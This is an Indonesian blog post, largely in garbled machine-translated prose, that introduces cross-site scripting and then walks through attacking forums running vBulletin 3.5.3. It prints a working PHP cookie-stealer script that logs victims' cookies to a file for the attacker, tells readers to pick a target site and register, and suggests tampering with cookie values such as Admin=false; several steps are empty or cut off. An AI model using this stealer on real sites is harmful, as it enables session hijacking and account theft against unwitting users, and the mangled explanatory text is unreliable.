oke....w bakal kasih tau apa itu hacking XSS..dan cara kerjanya....
so ikutin trus blog w...
Penggunaan internet sekarang menjalar ke seluruh pojok dunia, Internet juga sudah menjadi salah satu alat komunikasi paling cepat, sederhana dan sangat memuaskan sebaik sebagai innovatif karena dimungkinkan bagi pemakainya melakukan komunikasi dengan bekas teks, suara, gambar pun dan video.
Tetapi, serta semakin maju dan perluasan informasi alat dan komunikasi yang tersebut dinamai Internet ini, ancaman dan kejahatan berbagai yang juga semakin berkembang sesuai perkembangan alatnya secara pribadi.
Dimulai dari jumlah pembajak kartu kredit yang milik orang yang lain di dunia Internet bahwa diakui sebagai Carder, kepada pembajak data yang milik orang yang lain dan melakukan pengerusakan ke arah suatu situs web/database milik orang yang lain di Internet, yang biasanya diketahui oleh nama Black Hat Hacker/Cracker.
Situs web, alat yang juga menjadi bagian dalam Internet secara pribadi, sekarang menjadi semakin sedang berkembang dan menjadi semakin rumit.
Situs web yang dikenal juga sebagai tempat untuk memberi, bertukaran sebaik sebagai memberangkatkan berbagai informasi sekarang ini terbentuk ke sesuatu bahwa dynamic, di mana segalanya bisa kelihatan berbeda, sesuai menentukan yang dipindahkan ke luar di samping situs web pemakai bahwa secara pribadi.
Secara mendasar, situs web bahwa dynamic itu secara pribadi secara persis mengalami ancaman yang tidak dialami di samping gangguan udara situs web kebanyakan, salah satu serangan kinds itu bisa dipindahkan ke luar ke kebanyakan situs web dynamic adalah XSS (Cross-Site Scripting).
What is Cross-Site Scripting?!
Cross-Site Scripting, itu juga diketahui oleh nama pendek XSS atau CSS, adalah semacam serangan yang bisa dikatakan atau digolongkan di sejenis medium serangan rata/tengah-tengah, karena anda tidak akan dapat secara langsung sampai akses administrator rekening suka bahwa kebanyakan dilakukan SQL Injection.
XSS secara pribadi biasanya hadir karena naskah keberadaan 'nakal' ke satu situs web bahwa nampak dimasukan oleh pemakai situs web bahwa secara pribadi.
XSS juga sering dipakai dengan membuatnya rupanya seperti satu hyper-hubungan bahwa kemudian akan di klik oleh sasaran, dan bisa disebarkan di berbagai tempat suka utusan, situs web, forum dan berbagai tmpt lain.
Biasanya menghubungkan ini lalu ditulis di bentuk hexa menyandi supaya memaksa banyak orang tertipu dan tidak membaca menghubungkan ini dengan benar, tetapi hanya meng-klik dia dan menjadikannya korban pelaku.
Lalu mengenai ini bersiap-siap jika anda mendapat link yang tak jelas di Internet.
Why XSS also knwon as CSS?!
Seringkali orang mengartikan Cross Site Scripting mentah mentah menjadi CSS, dan itu membuat kebingungan karena CSS secara pribadi sebenarnya dimaksudkan Cascading Style Sheet.
Sedangkan tak jarang juga ahli keamanan dan ahli Internet menyebutkan Cross Site Scripting sebagai XSS (di mana tanda X dibaca dengan Salib), supaya jika anda mengetahui orang mengatakan "saya menemukan celah XSS di situs web", lalu sudah tentu orang ini berarti mengatakan jika dia menemukan kelemahan Cross Site Scripting di dalam situs web tersebut.
How Dangerous is XSS?
Sering agresor akan membawa ke luar injeksi JavaScript, VBScript, HTML, Kilisan atau ActiveX di situs web lamaran bahwa bisa ialah adalahnya dikatakan rentan dengan serangan XSS ini untuk menjadi dapat mendapat informasi dari pemakai lain, dan tak ada informasi langka bahwa disebarkan benar-benar penting.
Semua urusan yang dihubungkan dengan biskuit pencurian, melakukan pembajakan ke rekening lain orang di tempat tertentu, sebaik seperti yang melakukan ganti dalam terbenam satu orang pemakai bisa dan mungkin dilakukan dengan memakai XSS ini, bisa dilakukan macam soal seperti pengalihan juga dengan memakai sedikit teknik yang berbeda.
The Example of XSS within the Forum Machine
XSS amat banyak bekas, dan benar-benar terbaru di masalah naskah perkembangan dia.
Banyak lamaran situs web menjadi mangsa XSS ini.
Di artikel kali ini saya juga akan memberi salah satu contoh XSS yang ada di salah satu produk forum terkenal untuk dunia, bahwa ialah vBulletin.
Terlebih dulu tama anda harus mencari sasaran, yaitu satu situs web yang membuat penggunaan forum vBulletin versi 3.
5.
3 dan melakukan pendaftaran di sana.
Sesudah menjadi anggota di sana, anda harus berusaha untuk membawa ke luar kata teguran perbedaan.
Pergi untuk menghubungkan/forum/profiltambahan niy
tambahan.....^^
sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2
Step 1
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
save => stealer.php
Step2
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya
Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni
Step 3
step 4
Nah buka xssed.txtnya deh
step 5
Cookie Manipulation:
Ni cuman contoh aja
Terkadang lo bakan melihat cookie yang terlihat seperti:
Admin=false;
Or
Logged_in=true;
Jangan binggung gunain javascriptnya
Javascript:alert(document.
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar